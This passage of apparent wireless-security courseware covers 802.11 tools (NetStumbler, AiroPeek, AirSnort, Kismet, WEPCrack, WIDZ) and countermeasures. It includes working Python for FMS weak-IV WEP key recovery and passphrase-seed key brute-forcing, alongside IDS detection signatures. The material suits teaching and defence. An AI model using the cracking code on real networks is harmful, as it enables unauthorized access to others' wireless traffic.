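NETSTUMBLER_OUI = b"\x00\x60\x1d"       # LLC/SNAP OUI quoted in the note above
NETSTUMBLER_PID = 0x0001                # LLC/SNAP protocol identifier
PAYLOAD_LEN = 58                        # size of the version-string payload
VERSION_STRINGS = {                     # per-version strings quoted in the note
    b"Flurble gronk bloopit, bnip Frundletrune": "3.2.0",
    b"All your 802.11b are belong to us": "3.2.3",
}


def mac(raw):
    return ":".join("%02x" % b for b in raw)


def parse_data_frame(frame):
    """Split an unencrypted, non-QoS 802.11 data frame (type 2, subtype 0) into
    source address, LLC/SNAP OUI, PID and payload. Returns None for anything else."""
    if len(frame) < 24 + 8:
        return None
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype != 2 or subtype != 0:
        return None
    if fc1 & 0x40:                      # Protected Frame bit: the LLC header is encrypted
        return None
    body = frame[24:]
    if body[:3] != b"\xaa\xaa\x03":     # DSAP, SSAP, control of a SNAP frame
        return None
    return {
        "src": mac(frame[10:16]),       # Address 2 = transmitter
        "oui": body[3:6],
        "pid": struct.unpack("!H", body[6:8])[0],
        "payload": body[8:],
    }


def netstumbler_version(frame):
    """Version string if the frame carries the NetStumbler signature, else None."""
    p = parse_data_frame(frame)
    if p is None or p["oui"] != NETSTUMBLER_OUI or p["pid"] != NETSTUMBLER_PID:
        return None
    if len(p["payload"]) != PAYLOAD_LEN:
        return None
    for marker, version in VERSION_STRINGS.items():
        if marker in p["payload"]:
            return version
    if p["payload"].strip(b" \x00") == b"":
        return "3.3.0"                  # blank payload
    return "unknown"


def scan_capture(frames):
    """Run the signature over raw frames; returns (source MAC, version) hits."""
    hits = []
    for frame in frames:
        version = netstumbler_version(frame)
        if version is not None:
            hits.append((parse_data_frame(frame)["src"], version))
    return hits


# --- constructed sample frames (assumed layout) ---------------------------------
def build_data_frame(src, bssid, oui, pid, payload):
    """24-byte data header (ToDS=1, addr1=addr3=BSSID, addr2=source) + LLC/SNAP + payload."""
    hdr = bytes([0x08, 0x01]) + b"\x00\x00" + bssid + src + bssid + b"\x00\x00"
    return hdr + b"\xaa\xaa\x03" + oui + struct.pack("!H", pid) + payload


def netstumbler_payload(text):
    """Four leading bytes, then the version string, space-padded to 58 bytes (assumed)."""
    return (b"\x00" * 4 + text).ljust(PAYLOAD_LEN, b" ")


STUMBLER = bytes.fromhex("020000000001")   # locally administered test MACs
AP = bytes.fromhex("020000000002")
SAMPLE_CAPTURE = [
    build_data_frame(STUMBLER, AP, NETSTUMBLER_OUI, NETSTUMBLER_PID,
                     netstumbler_payload(b"Flurble gronk bloopit, bnip Frundletrune")),
    build_data_frame(STUMBLER, AP, NETSTUMBLER_OUI, NETSTUMBLER_PID,
                     netstumbler_payload(b"All your 802.11b are belong to us")),
    build_data_frame(STUMBLER, AP, NETSTUMBLER_OUI, NETSTUMBLER_PID,
                     netstumbler_payload(b"")),
    # ordinary IPv4 traffic: OUI 00:00:00, PID 0x0800, must not match
    build_data_frame(bytes.fromhex("020000000003"), AP, b"\x00\x00\x00", 0x0800, b"\x45" * 58),
]

if __name__ == "__main__":
    for src, version in scan_capture(SAMPLE_CAPTURE):
        print("NetStumbler %s from %s" % (version, src))
```

The Ethereal filter keys on four payload bytes at a fixed offset; this version looks for the whole string anywhere in the payload and additionally refuses frames with the Protected Frame bit set, since the LLC header of an encrypted frame is not visible.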

start sidebar
Hacking Tool: AiroPeek

http://www.wildpackets.com

  • AiroPeek is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all higher-level network protocols such as TCP/IP, AppleTalk, NetBEUI and IPX.

  • In addition, AiroPeek quickly isolates security problems, fully decodes 802.11a and 802.11b WLAN protocols, and analyzes wireless network performance with accurate identification of signal strength, channel and data rates.

end sidebar
 
Tools  

AiroPeek NX is a commercial 802.11 monitoring and analysis tool available for Windows 2000 and XP. It monitors a specific channel and reports on data rates, error rates, addresses seen and their activity; captures all 802.11b control, data and management frames; decodes and reports on the protocols in use (TCP/IP, AppleTalk, NetBEUI and IPX); and performs statistical analysis of all traffic or of filtered sets of captured packets.

AiroPeek's customizable three-pane view lets the user display a packet capture list, a single packet decode and the hex view of raw data, together or in any combination. The user can navigate through multiple selected packets to reconstruct the threads of network conversations. Multiple capture windows can be open simultaneously for easy comparison of packet views, protocol usage, or total traffic vs. traffic subsets.

AiroPeek supports Lucent and Cisco 802.11b cards and also has support for some of the newer 802.11a cards. AiroPeek NX is primarily designed for wireless network troubleshooting and analysis. AiroPeek NX supports channel scanning at a user-defined interval as well as decrypting traffic on the fly with a provided WEP key. AiroPeek NX's filtering is also configurable. AiroPeek NX also provides a useful Nodes view, which groups detected stations by their MAC address and will also show IP addresses and protocols observed for each.

AiroPeek NX has a new view called the SSID Tree, available on the Nodes Tab. The SSID Tree provides an intuitive, hierarchical view, displaying the relationship between WLAN ESSIDs, Access Points and their associated Stations. The SSID Tree also facilitates the auditing of Encryption and Authentication schemes in use.

AiroPeek can fully decode all 802.11 protocols, displaying management, control and data packets as well as all higher-level network protocols such as TCP/IP, AppleTalk, NetBEUI and IPX. AiroPeek tells you the status, length, and timestamp of a packet immediately, adding:

  • The speed at which the packet was transmitted

  • The channel number and radio frequency at which the packet was transmitted

  • The signal strength of the transmission in which the packet was received. [2]

start sidebar
Hacking Tool: Airsnort

http://airsnort.shmoo.com/

  • AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered.

  • AirSnort requires approximately 5-10 million encrypted packets to be gathered.

  • Once enough packets have been gathered, AirSnort can recover the key in under a second.

end sidebar
 
Tools  

AirSnort is a collection of scripts and programs derived from research by Tim Newsham, the University of Maryland, and the University of California at Berkeley. It is a wireless LAN (WLAN) tool which recovers encryption keys by passively monitoring transmissions and computing the key once enough packets have been gathered; approximately 5-10 million encrypted packets are needed, after which the key is recovered in under a second. Weak IVs are collected and sorted according to which key byte they help to expose; a weak IV can assist in exposing only one key byte. When a sufficient number of weak IVs have been gathered for a particular key byte, statistical analysis shows a tendency towards a particular value for that key byte.

Each of the 256 possible values for a given key byte is scored according to the probability of its being the correct value. The crack process then guesses the key bytes starting from the highest-ranking values from the statistical analysis phase. The number of guesses that AirSnort makes for each key byte is governed by the 'breadth' parameter in its preferences. Several guesses are needed because the statistics are noisy: weak IVs are not distributed linearly across the IV space, and only a fraction of the weak IVs collected for a byte actually leak it.
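The scoring just described, as an added Python example (not AirSnort's code): it produces a constructed capture of first ciphertext bytes under a 40-bit key for IVs of the form (a, 254|255, x), votes for each key byte using the FMS "resolved" condition, and searches the top-ranked candidates with a breadth parameter, verifying each full guess against the capture. The key and the IV set are constructed for the example; the only fact taken from WEP itself is that the first plaintext byte of every data frame is the LLC/SNAP byte 0xAA.

```python
SNAP_FIRST_BYTE = 0xAA   # every WEP data frame's plaintext starts with the LLC/SNAP DSAP byte


def rc4_ksa(key):
    """RC4 key scheduling: returns the 256-byte permutation S for the given key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def first_keystream_byte(key):
    """First byte RC4 outputs for the key (IV || secret key in WEP)."""
    s = rc4_ksa(key)
    i, j = 1, s[1]
    s[i], s[j] = s[j], s[i]
    return s[(s[i] + s[j]) & 0xFF]


def sniff_frames(secret, ivs):
    """Constructed capture: (IV, first ciphertext byte) for each frame sent under `secret`."""
    return [(iv, first_keystream_byte(bytes(iv) + secret) ^ SNAP_FIRST_BYTE) for iv in ivs]


def vote_for_byte(frames, known):
    """FMS scoring for secret key byte number len(known): simulate the KSA steps driven
    by the IV and the already-recovered bytes, keep only 'resolved' states, and vote."""
    a = 3 + len(known)                     # position of the attacked byte in IV || key
    votes = {}
    for iv, c in frames:
        if iv[0] != a:                     # classic weak class for this byte: (a, 254|255, x)
            continue
        key = bytes(iv) + bytes(known)
        s = list(range(256))
        j = 0
        for i in range(a):
            j = (j + s[i] + key[i]) & 0xFF
            s[i], s[j] = s[j], s[i]
        if s[1] >= a or (s[1] + s[s[1]]) & 0xFF != a:
            continue                       # S[1] + S[S[1]] must already point at position a
        z = c ^ SNAP_FIRST_BYTE            # observed first keystream byte
        cand = (s.index(z) - j - s[a]) & 0xFF
        votes[cand] = votes.get(cand, 0) + 1
    return votes


def crack(frames, keylen, breadth=3):
    """Depth-first search over the `breadth` best-scored values per byte (AirSnort's
    'breadth' setting), verifying every full guess against captured frames."""
    def verify(key):
        return all(first_keystream_byte(bytes(iv) + key) ^ SNAP_FIRST_BYTE == c
                   for iv, c in frames[:8])

    def search(known):
        if len(known) == keylen:
            key = bytes(known)
            return key if verify(key) else None
        votes = vote_for_byte(frames, known)
        for cand in sorted(range(256), key=lambda v: -votes.get(v, 0))[:breadth]:
            found = search(known + [cand])
            if found is not None:
                return found
        return None

    return search([])


if __name__ == "__main__":
    SECRET = bytes([0x1F, 0x7A, 0x03, 0xC4, 0x5B])       # constructed 40-bit key
    weak_ivs = [(a, b, x) for a in range(3, 8) for b in (254, 255) for x in range(256)]
    frames = sniff_frames(SECRET, weak_ivs)
    print(crack(frames, 5).hex())                       # 1f7a03c45b
```

Only about one resolved IV in twenty actually leaks its key byte; the rest vote for a uniformly random value, which is why the correct byte wins by a margin rather than unanimously and why a breadth greater than one is worth having.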

AirSnort can capture in two modes. Monitor mode enables a wireless NIC to capture packets without associating with an access point or ad-hoc network, which is desirable when the user does not want to transmit any packets; in fact, transmitting is sometimes not possible while in monitor mode (driver dependent). Another aspect of monitor mode is that the NIC does not check the frame CRC, so some captured packets may in fact be corrupted. Promiscuous mode lets the user view all wireless packets on a network to which the card is associated. The need to associate means that the user must have some means of authenticating to an access point, and no packets are seen until the association completes. Not all wireless drivers support promiscuous mode.

start sidebar
Hacking Tool: Kismet
  • Kismet is an 802.11b wireless network sniffer which separates and identifies the different wireless networks in the area.

  • Kismet works with any wireless card which is capable of reporting raw packets.

end sidebar
 
Tools  

Kismet is a Linux- and BSD-based wireless sniffer with war-driving functionality. It allows the user to track wireless access points and their GPS locations. Kismet is a passive network-detection tool that cycles through the available wireless channels looking for 802.11 packets that indicate the presence of a wireless LAN, such as Beacons and Association Requests. Kismet also gathers additional information about a network where it can, such as IP addressing and Cisco Discovery Protocol (CDP) names. Kismet works with any 802.11b wireless card capable of reporting raw packets (rfmon support), which includes any Prism2-based card (Linksys, D-Link, RangeLAN, etc.), Cisco Aironet cards, and Orinoco-based cards. Kismet also supports the WSP100 802.11b remote sensor by Network Chemistry and can monitor 802.11a networks with cards that use the ar5k chipset. GPS support is provided via the GPSD daemon, which is also included with the navigation software GPSDrive. Current versions of GPSDrive distribute a GPSD that works with Kismet; earlier versions (1.17 and earlier) did not. GPSD provides network-accessible GPS data from a wide variety of GPS receivers.

Kismet can use a GPSD running on the local machine or on a remote host. Kismet writes an XML log file of the travel path taken and the packets seen, and the gpsmap program that comes with Kismet plots these files onto a graphical map. Other features of Kismet include support for multiple packet sources, channel hopping, detecting IP blocks, detecting Cisco products via CDP, logging as Ethereal/tcpdump-compatible files, logging AirSnort-compatible 'interesting' (cryptographically weak) packets, de-cloaking hidden SSIDs, grouping and custom naming of SSIDs, multiple clients viewing a single capture stream, graphical mapping of data (gpsmap), cross-platform support (handheld Linux and BSD), manufacturer identification, detection of default access point configurations, detection of NetStumbler clients, runtime decoding of WEP packets and multiplexing of multiple capture sources. [3]

start sidebar
WEPCrack
  • WEPCrack is an open source tool for breaking 802.11 WEP secret keys.

  • While AirSnort has captured the media attention, WEPCrack was the first publicly available code that demonstrated the weak-IV attack.

  • The current tools are Perl based and are composed of the following scripts:

     WeakIVGen.pl, prism-getIV.pl, WEPCrack.pl 
end sidebar
 
Tools  

Let's take a look at the structure of WEPCrack. The tool is divided into four parts: the packet collector, the guess generator, the mapping of guesses to keys, and the key verifier. The packet collector collects the packets needed for guess verification, i.e. 802.11 DATA packets. A minimum of two packets is collected.


It can also read from a pcap-format file, which simplifies the design and allows off-line cracking; the capture can be made with utilities such as PrismDump that already write this format. The guess generator supports a dictionary attack by reading a wordlist from a file, or a brute-force attack by generating sequential PRNG seeds between 00:00:00:00 and 00:7f:7f:7f. In mapping guesses to keys, WEPCrack can translate ASCII directly to key bytes (five ASCII bytes map to a single 40-bit, so-called 64-bit, WEP key; thirteen ASCII bytes map to a 104-bit, so-called 128-bit, key; long words are truncated and short words zero-filled) or use any of the key generator functions (map ASCII to keys with the 64-bit generator, map ASCII to keys with the 128-bit generator, map PRNG seeds to keys with the 64-bit generator).
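The key-mapping and seed-generation steps described above, as an added Python example (not WEPCrack's Perl code): the direct ASCII mapping with truncation and zero-fill, the 40-bit passphrase generator (assumed here to be the widely implemented one: XOR the passphrase bytes into a 32-bit seed, then take bits 16-23 of five successive steps of the linear congruential generator x = 0x343FD*x + 0x269EC3), the 104-bit generator (assumed to be MD5 over the passphrase repeated to 64 bytes), and a seed search in the 00:00:00:00 to 00:7f:7f:7f order. The verifier callback and the passphrases are constructed for the example.

```python
import hashlib

RAND_MUL, RAND_ADD = 0x343FD, 0x269EC3       # constants of the C runtime rand() LCG (assumed)


def ascii_to_key(word, keylen):
    """Direct mapping: the first keylen ASCII bytes, zero-filled when the word is short."""
    return word.encode("ascii")[:keylen].ljust(keylen, b"\x00")


def passphrase_to_seed(passphrase):
    """XOR every passphrase byte into one of four seed bytes (byte i -> seed byte i mod 4)."""
    seed = 0
    for i, ch in enumerate(passphrase.encode("ascii")):
        seed ^= ch << (8 * (i & 3))
    return seed


def key40_from_seed(seed):
    """Run the 32-bit LCG five times; each key byte is bits 16-23 of the state."""
    key = bytearray()
    for _ in range(5):
        seed = (seed * RAND_MUL + RAND_ADD) & 0xFFFFFFFF
        key.append((seed >> 16) & 0xFF)
    return bytes(key)


def generate_key40(passphrase):
    """'64-bit generator': passphrase -> seed -> 5 key bytes."""
    return key40_from_seed(passphrase_to_seed(passphrase))


def generate_key104(passphrase):
    """'128-bit generator': repeat the passphrase to 64 bytes, MD5 it, keep 13 bytes."""
    buf = (passphrase.encode("ascii") * 64)[:64]
    return hashlib.md5(buf).digest()[:13]


def weak_seeds():
    """Every seed a passphrase can produce, in 00:00:00:00 .. 00:7f:7f:7f order.
    Bit 7 of each byte is never set (ASCII), and bits 24-31 of the seed never reach
    bits 16-23 of any later LCG state, so only 21 bits of the seed matter."""
    for b2 in range(128):
        for b1 in range(128):
            for b0 in range(128):
                yield (b2 << 16) | (b1 << 8) | b0


def brute_force_key40(verify):
    """WEPCrack-style seed search: returns the first generated key that `verify` accepts,
    where `verify` is the caller's key verifier (a check against captured frames)."""
    for seed in weak_seeds():
        key = key40_from_seed(seed)
        if verify(key):
            return key
    return None


if __name__ == "__main__":
    print(generate_key40("").hex(), generate_key104("ab").hex())
    # seeds 0x00123456 and 0xAB123456 give the same key: the top byte is dead weight
    print(key40_from_seed(0x00123456) == key40_from_seed(0xAB123456))
```

The search space of 2^21 seeds is what makes "brute force by PRNG seed" practical against passphrase-derived 40-bit keys; a verifier that checks a candidate key against two captured data frames, as WEPCrack's collector gathers, rejects every wrong candidate.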

start sidebar
Other Tools
  • Network discovery tools run on 802.11 stations and passively monitor beacon and probe response frames. They typically display discovered devices by SSID, channel, MAC address and location.

  • Vulnerability assessment tools, in addition to network discovery, sniff traffic to spot security policy violations.

  • Traffic monitoring and analysis tools also provide discovery and vulnerability alerting. In addition, they capture and examine packet content.

  • IDSes may use signature analysis, protocol inspection, rules enforcement and/or anomaly detection.

end sidebar
 

Network discovery tools run on 802.11 stations and passively monitor beacon and probe response frames. Some actively probe for APs and stations configured for peer to peer. They typically display discovered devices by SSID, channel, MAC address and location (when used with a GPS), generating basic data that can be saved to a file.

  • NetStumbler is a freeware AP discovery tool for Win32 systems.

  • MacStumbler is freeware AP discovery software for Mac OS X and Apple Airport adapters.

  • WaveStumbler is a freeware WLAN mapper for Linux.

  • AirTouch Network's Security System War Driving Kit is a commercial war-driving kit, complete with sniffing software, 802.11b adapter and antenna.

Vulnerability assessment tools, in addition to network discovery, sniff traffic to spot security policy violations (e.g., APs with default SSID, stations or APs in open-system mode). They query APs to obtain system information and identify risks (e.g., open ports). Assessment tools build a database of known APs and stations so that rogue devices and changes can be highlighted when the assessment is repeated at regular intervals. They generate alerts or reports that document vulnerabilities.

  • AirMagnet's Handheld/Laptop Analyzer series are portable analyzers for Win32 laptops and Pocket PC 2002.

  • Internet Security Systems' Wireless Security Scanner is a Windows 2000 based vulnerability checker with limited penetration scanning.

  • WaveSecurity's WaveScanner is detection, assessment and reporting tool for Linux; uses Prism2 adapters.

Traffic monitoring and analysis tools also provide discovery and vulnerability alerting. In addition, they capture and examine packet content (not just headers), so that applications' behavior can be examined. They're typically used for security and performance troubleshooting and trend analysis.

  • Wild Packets' AiroPeek is a real-time analyzer for 802.11a and b; runs on Windows XP/2000.

  • Network Instruments' Network Observer is a real-time analyzer for 802.11a/b, Token Ring, and FDDI for Win32.

  • Network Associates' Sniffer Wireless real-time analyzer for 802.11a/b runs on Win32 and Pocket PC 2002.

  • Ethereal is a freeware network protocol analyzer with WLAN support on certain platforms.

Intrusion Detection: As in wired networks, IDSes provide 24/7 network-layer monitoring for possible intrusions. IDSes may use signature analysis, protocol inspection, rules enforcement and/or anomaly detection.

  • Air Defense's Air Defense Guard IDS appliance employs remote sensors to capture 802.11 packets and send summaries to central IDS engine.

  • Latis Networks' Still Secure Border Guard is a WLAN gateway that focuses on intrusion detection and content filtering for 802.11, stripping worms and similar viral payload at the gateway.

start sidebar
WIDZ, Wireless Intrusion Detection System
  • WIDZ version 1 is a proof-of-concept IDS for 802.11 that guards APs and monitors local frequencies for potentially malevolent activity.

  • It detects scans, association floods, and bogus/rogue APs. It can easily be integrated with Snort or RealSecure.

end sidebar
 
Countermeasure  

WIDZ version 1 is a proof-of-concept IDS for 802.11 that guards one or more APs and monitors local frequencies for potentially malevolent activity. It detects scans, association floods and bogus/rogue APs, and can easily be integrated with Snort or RealSecure.

The widz_apmon.c module covers two threats:

  • Bogus APs are designed to steal the association. Once this is achieved, login credentials can be retrieved or a man-in-the-middle attack can be performed.

  • Unauthorized APs are the ones that typically allow anyone access to the corporate LAN without a password.

The widz_probemon.c module has two functions:

  • Probe monitoring - picks up probe requests that do not have the ESSID field set.

  • Flood detection - Picks up attempts to flood the AP with associations

A program named Alert is executed each time an alert is raised. The WIDZ package provides an example script which shows how to send a syslog message, write to the console or current terminal, send an SNMP trap and send an e-mail.
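The two widz_probemon checks and the widz_apmon check, as an added Python example (not WIDZ's C code): null-SSID probe requests, an association-request flood per AP over a sliding window, and beacons from BSSIDs outside an authorized table, flagged as bogus when they advertise an authorized SSID. The capture, the MAC addresses, the 20-requests-per-2-seconds flood threshold and the {bssid: ssid} authorized table are constructed for the example.

```python
import struct
from collections import defaultdict, deque

PROBE_REQ, ASSOC_REQ, BEACON = 0x4, 0x0, 0x8   # management frame subtypes
BCAST = b"\xff" * 6
FLOOD_THRESHOLD = 20      # assumed: association requests per AP per window that raise an alert
FLOOD_WINDOW_MS = 2000    # assumed window length


def mac(raw):
    return ":".join("%02x" % b for b in raw)


def mgmt_subtype(frame):
    """Subtype of a management frame (type 0), or None for any other frame type."""
    fc0 = frame[0]
    return fc0 >> 4 if (fc0 >> 2) & 0x3 == 0 else None


def ssid_element(ies):
    """Value of the SSID element (ID 0) in a run of information elements, else None."""
    i = 0
    while i + 2 <= len(ies):
        eid, ln = ies[i], ies[i + 1]
        if eid == 0:
            return ies[i + 2:i + 2 + ln]
        i += 2 + ln
    return None


def probe_monitor(capture):
    """Probe monitoring: probe requests whose SSID element is empty (broadcast probes)."""
    alerts = []
    for ts, frame in capture:
        if mgmt_subtype(frame) == PROBE_REQ and ssid_element(frame[24:]) == b"":
            alerts.append((ts, "null-ssid-probe", mac(frame[10:16])))   # Address 2 = source
    return alerts


def flood_monitor(capture, threshold=FLOOD_THRESHOLD, window=FLOOD_WINDOW_MS):
    """Flood detection: sliding-window count of association requests per AP (Address 1)."""
    recent, last_alert, alerts = defaultdict(deque), {}, []
    for ts, frame in capture:
        if mgmt_subtype(frame) != ASSOC_REQ:
            continue
        ap = mac(frame[4:10])
        q = recent[ap]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ts - last_alert.get(ap, -window - 1) > window:
            last_alert[ap] = ts                 # one alert per AP per window
            alerts.append((ts, "assoc-flood", ap))
    return alerts


def ap_monitor(capture, authorized):
    """AP monitoring: beacons from a BSSID not in the authorized {bssid: ssid} table,
    'bogus-ap' when they advertise an authorized SSID, else 'unauthorized-ap'."""
    alerts, seen = [], set()
    for ts, frame in capture:
        if mgmt_subtype(frame) != BEACON:
            continue
        bssid = mac(frame[16:22])               # Address 3 = BSSID
        if bssid in authorized or bssid in seen:
            continue
        seen.add(bssid)
        ssid = ssid_element(frame[36:])         # body: timestamp(8) + interval(2) + capability(2)
        kind = "bogus-ap" if ssid in authorized.values() else "unauthorized-ap"
        alerts.append((ts, kind, bssid))
    return alerts


# --- constructed capture: (timestamp in ms, raw frame) -------------------------
def mgmt_frame(subtype, addr1, addr2, addr3, body):
    return bytes([subtype << 4, 0x00]) + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + body


def probe_request(src, ssid):
    return mgmt_frame(PROBE_REQ, BCAST, src, BCAST, bytes([0, len(ssid)]) + ssid)


def assoc_request(src, ap):
    body = struct.pack("<HH", 0x0001, 10) + bytes([0, 4]) + b"corp"   # capability, listen interval, SSID
    return mgmt_frame(ASSOC_REQ, ap, src, ap, body)


def beacon(ap, ssid):
    body = b"\x00" * 8 + struct.pack("<HH", 100, 0x0001) + bytes([0, len(ssid)]) + ssid
    return mgmt_frame(BEACON, BCAST, ap, ap, body)


GOOD_AP, ROGUE_AP, EVIL_TWIN = (bytes.fromhex(h) for h in ("020000000a01", "020000000a02", "020000000a03"))
STUMBLER = bytes.fromhex("020000000c01")
AUTHORIZED = {mac(GOOD_AP): b"corp"}
SAMPLE_CAPTURE = (
    [(0, probe_request(STUMBLER, b"")),                               # stumbler's broadcast probe
     (100, probe_request(bytes.fromhex("020000000c02"), b"corp")),   # ordinary directed probe
     (200, beacon(GOOD_AP, b"corp")),
     (300, beacon(ROGUE_AP, b"linksys")),                             # unauthorized AP, default SSID
     (400, beacon(EVIL_TWIN, b"corp"))]                               # bogus AP cloning the corporate SSID
    + [(1000 + 50 * k, assoc_request(bytes([2, 0, 0, 0, 0x10, k]), GOOD_AP)) for k in range(25)]
)

if __name__ == "__main__":
    for alert in probe_monitor(SAMPLE_CAPTURE) + flood_monitor(SAMPLE_CAPTURE) + ap_monitor(SAMPLE_CAPTURE, AUTHORIZED):
        print(alert)
```

The flood check keys on Address 1 rather than on the client address because a flooding tool spoofs a fresh source MAC per request; the per-AP window is what makes the pattern visible.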

start sidebar
Securing Wireless Networks
  • Treat Access Points as Untrusted

  • Access Point Configuration Policy

  • Access Point Discovery

  • Access Point Security Assessments

  • Wireless Client Protection

end sidebar
 
Countermeasure  

Treat Access Points As Untrusted - Access points need to be identified and evaluated on a regular basis to determine if they need to be quarantined as untrusted devices before wireless clients can gain access to internal networks. This determination means appropriate placement of firewalls, virtual private networks (VPN), intrusion detection systems (IDS), and authentication between access point and intranets or the Internet.

Countermeasure  

Access Point Configuration Policy - Administrators need to define standard security settings for any 802.11b access point before it can be deployed. These guidelines should cover the SSID, WEP keys and encryption, and SNMP community strings.

Countermeasure  

Access Point Discovery - Administrators should regularly search outwards from a wired network to identify unknown access points. Several methods of identifying 802.11b devices exist, including detection via banner strings on access points with either Web or telnet interfaces. Wireless network searches can identify unauthorized access points by setting up a 2.4 GHz monitoring agent that searches for 802.11b packets in the air.

These packets may contain IP addresses that identify which network they are on, indicating that rogue access points are operating in the area. One important note: this process may pick up access points from other organizations in densely populated areas.

Countermeasure  

Access Point Security Assessments - Regular security audits and penetration assessments quickly identify poorly configured access points, default or easily guessed passwords and community strings, and the presence or absence of encryption. Router ACLs and firewall rules also help minimize access to the SNMP agents and other interfaces on the access point.

Countermeasure  

Wireless Client Protection - Wireless clients need to be regularly examined for good security practices. These procedures should include some or all of the following:

  • Distributed personal firewalls to lock down access to the client

  • VPNs to supplement encryption and authentication beyond what 802.11b can provide. VPN encryption can also reduce throughput on a wireless network considerably.

  • Intrusion detection and response to identify and minimize attacks from intruders, viruses, Trojans and backdoors

  • Desktop assessments to identify and repair security issues on the client device [4]

start sidebar
Out of the box security
end sidebar
 
Countermeasure  

The first out-of-the-box countermeasure is to ensure that WEP (Wired Equivalent Privacy) is turned on. WEP comes in two variants. 40-bit WEP is marketed as 64-bit WEP because the 40-bit key is combined with a 24-bit IV; the user must know a 10-hex-digit network key to join such a network. The second variant, 104-bit (marketed as 128-bit) WEP, uses a 26-hex-digit key. Rotating WEP keys monthly is a good practice, although it does not defeat the weak-IV attack described under AirSnort: a key that sees a few million frames between rotations can still be recovered.

Figure: WEP Privacy Using RC4 Algorithm
start sidebar
RADIUS: used as an additional layer of security
end sidebar
 
Countermeasure  

Remote Authentication Dial-In User Service (RADIUS) is a widely deployed protocol enabling centralized authentication, authorization, and accounting for network access. Originally developed for dial-up remote access, RADIUS is now supported by virtual private network (VPN) servers, wireless access points, authenticating Ethernet switches, Digital Subscriber Line (DSL) access, and other network access types. The RADIUS protocol is a client/server security protocol defined in the IETF's RFCs 2138 and 2139 (since superseded by RFCs 2865 and 2866). RADIUS allows network managers to reduce the risk of distributing security information across many devices by centralizing authentication and permission attributes in a single server.

RADIUS is a standard technology that is used to protect access to wireless networks. RADIUS is a user name and password scheme that enables only approved users to access the network; it does not affect or encrypt data.

When a user wants access to the network, secure files or net locations, for the first time, he or she must input his or her name and password and submit it over the network to the RADIUS server. The server then verifies that the individual has an account and, if so, ensures that the person uses the correct password before she or he can get on the network.

RADIUS can be set up to provide different access levels or classes of access. For example, one level can provide blanket access to the Internet; another can provide access to the Internet as well as to e-mail communications; yet another account class can provide access to the Net, email and the secure business file server. Like other sophisticated security technologies already mentioned, RADIUS comes in a variety of types and levels.
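The exchange described above, as an added Python example (not from the courseware or any RADIUS implementation): the access point builds an Access-Request carrying a hidden User-Password, the server recovers and checks the password and answers Access-Accept or Access-Reject, and the access point verifies the Response Authenticator before trusting the answer, following RFC 2865. The shared secret, user table and request authenticator used in the sample run are constructed.

```python
import hashlib
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, USER_PASSWORD = 1, 2


def attrs(pairs):
    """Encode (type, value) pairs as RADIUS attributes: type, length, value."""
    return b"".join(bytes([t, len(v) + 2]) + v for t, v in pairs)


def parse_attrs(data):
    out = {}
    while data:
        t, ln = data[0], data[1]
        out[t] = data[2:ln]
        data = data[ln:]
    return out


def hide_password(password, secret, request_auth):
    """RFC 2865 5.2: XOR each 16-byte chunk with MD5(secret + previous ciphertext chunk)."""
    padded = password.ljust((len(password) + 15) // 16 * 16, b"\x00")
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        b = hashlib.md5(secret + prev).digest()
        chunk = bytes(x ^ y for x, y in zip(padded[i:i + 16], b))
        out += chunk
        prev = chunk
    return out


def reveal_password(hidden, secret, request_auth):
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        b = hashlib.md5(secret + prev).digest()
        out += bytes(x ^ y for x, y in zip(hidden[i:i + 16], b))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def packet(code, ident, authenticator, attributes):
    """Code(1) Identifier(1) Length(2) Authenticator(16) Attributes."""
    return struct.pack("!BBH", code, ident, 20 + len(attributes)) + authenticator + attributes


def response_authenticator(code, ident, request_auth, attributes, secret):
    """MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    return hashlib.md5(struct.pack("!BBH", code, ident, 20 + len(attributes))
                       + request_auth + attributes + secret).digest()


def client_access_request(ident, user, password, secret, request_auth=None):
    """NAS side (here the access point): build an Access-Request for the user."""
    request_auth = request_auth or os.urandom(16)
    a = attrs([(USER_NAME, user), (USER_PASSWORD, hide_password(password, secret, request_auth))])
    return packet(ACCESS_REQUEST, ident, request_auth, a), request_auth


def server_handle(request, secret, users):
    """Server side: recover the password, check it, answer Accept or Reject."""
    code, ident, length = struct.unpack("!BBH", request[:4])
    request_auth, a = request[4:20], parse_attrs(request[20:length])
    pw = reveal_password(a.get(USER_PASSWORD, b""), secret, request_auth)
    code = ACCESS_ACCEPT if users.get(a.get(USER_NAME)) == pw else ACCESS_REJECT
    return packet(code, ident, response_authenticator(code, ident, request_auth, b"", secret), b"")


def client_check_response(response, request_auth, secret):
    """NAS side: accept the answer only if its authenticator proves the server knows the secret."""
    code, ident, length = struct.unpack("!BBH", response[:4])
    expected = response_authenticator(code, ident, request_auth, response[20:length], secret)
    return code if response[4:20] == expected else None


if __name__ == "__main__":
    SECRET = b"shared-secret-between-ap-and-server"      # constructed
    USERS = {b"alice": b"correct horse"}
    req, ra = client_access_request(7, b"alice", b"correct horse", SECRET)
    resp = server_handle(req, SECRET, USERS)
    print(client_check_response(resp, ra, SECRET))        # 2 (Access-Accept)
```

Note what this exchange does and does not protect: User-Name travels in the clear, the password hiding is a keystream derived from the shared secret and the 16-byte Request Authenticator, and the Access-Accept carries no keying material for the wireless link, which is the sense in which RADIUS "does not affect or encrypt data".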

start sidebar
Maximum Security: Add VPN to Wireless LAN
end sidebar
 
Countermeasure  

The combination of VPN (IPSec) and 802.11 is an ideal solution for existing wireless networking security needs. For corporate networks, a VPN solution for wireless access is currently the most suitable alternative to WEP and MAC address filtering.

VPNs are already widely used for intranets and remote access. They employ various industry-standard security mechanisms to safeguard data and ensure that only authorized users can access the network. The VPN servers provide encapsulation, authentication and full encryption over the WLAN.
